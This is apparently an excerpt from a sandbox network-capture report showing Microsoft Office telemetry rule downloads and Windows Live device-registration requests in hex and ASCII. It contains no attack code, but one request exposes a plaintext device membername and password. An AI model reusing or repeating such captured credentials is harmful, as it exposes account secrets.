2024-11-10 03:55:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:21 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: c0039004-a01e-0070-7e5f-2e573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035521Z-15869dbbcc6ss7fxhC1DFWq6vs00000005hg000000003dnq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:21 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.5	49791	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:21 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:21 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: 09da145b-201e-0033-5108-32b167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035521Z-15869dbbcc6tjwwhhC1DFWn22800000005eg000000009xn4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:21 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.5	49790	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:21 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:21 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:21 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035521Z-16547b76f7f67wxlhC1DFWah9w0000000c40000000005rum x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:21 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49793	40.126.31.67	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:22 UTC	446	OUT	POST /ppsecure/deviceaddcredential.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 7642 Host: login.live.com
2024-11-10 03:55:22 UTC	7642	OUT	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 66 73 65 6f 67 79 75 6c 64 6b 73 78 70 79 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 36 76 69 49 40 48 58 55 46 24 60 2f 60 6a 47 69 6b 72 40 76 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 6e 71 75 73 6b 66 70 70 70 63 69 76 63 3c 2f 4f 6c 64 4d Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02fseogyuldksxpy</Membername><Password>6viI@HXUF$`/`jGikr@v</Password></Authentication><OldMembername>02vnquskfpppcivc</OldM
2024-11-10 03:55:31 UTC	542	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/xml Expires: Sun, 10 Nov 2024 03:54:22 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C542_BL2 x-ms-request-id: fa1b170f-d28a-4e88-b840-a4a25ea71f9d PPServer: PPV: 30 H: BL02EPF0001D985 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sun, 10 Nov 2024 03:55:30 GMT Connection: close Content-Length: 17166
2024-11-10 03:55:31 UTC	15842	IN	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 34 30 31 30 36 35 34 38 38 38 41 43 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 31 33 64 31 37 31 66 63 2d 63 39 33 36 2d 34 34 64 35 2d 61 64 66 61 2d 39 66 36 36 62 35 39 64 65 66 38 34 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>00184010654888AC</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="13d171fc-c936-44d5-adfa-9f66b59def84" LicenseID="3252b20c-d425-4711
2024-11-10 03:55:31 UTC	1324	IN	Data Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66 Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49792	40.126.31.67	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:22 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-10 03:55:22 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-10 03:55:22 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Sun, 10 Nov 2024 03:54:22 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_SN1 x-ms-request-id: ce4a5c6a-cf8e-4e14-9b4f-7d5fabd8b2d3 PPServer: PPV: 30 H: SN1PEPF0002F157 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sun, 10 Nov 2024 03:55:21 GMT Connection: close Content-Length: 1276
2024-11-10 03:55:22 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.5	49798	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:22 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:22 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 99102dbc-c01e-0066-43c1-2ca1ec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035522Z-16547b76f7f8dwtrhC1DFWd1zn0000000c5000000000g430 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:22 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.5	49802	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:22 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:22 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 9fa60dcf-d01e-008e-7a27-2f387a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035522Z-15869dbbcc6lxrkghC1DFWqpdc00000004gg00000000236m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:22 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.5	49799	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:22 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:22 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:22 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 1c98c384-301e-0096-1749-32e71d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035522Z-15869dbbcc6xcpf8hC1DFWxtx00000000ec000000000a1mc x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:22 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.5	49801	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:22 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:22 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 9ed27c23-f01e-0020-6955-2e956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035522Z-15869dbbcc6hgzkhhC1DFWgtqs00000003d000000000dg4d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:22 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.5	49800	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:22 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:22 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: 23d3b202-401e-0083-108e-2d075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035522Z-15869dbbcc6lxrkghC1DFWqpdc00000004e0000000008v4w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:22 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 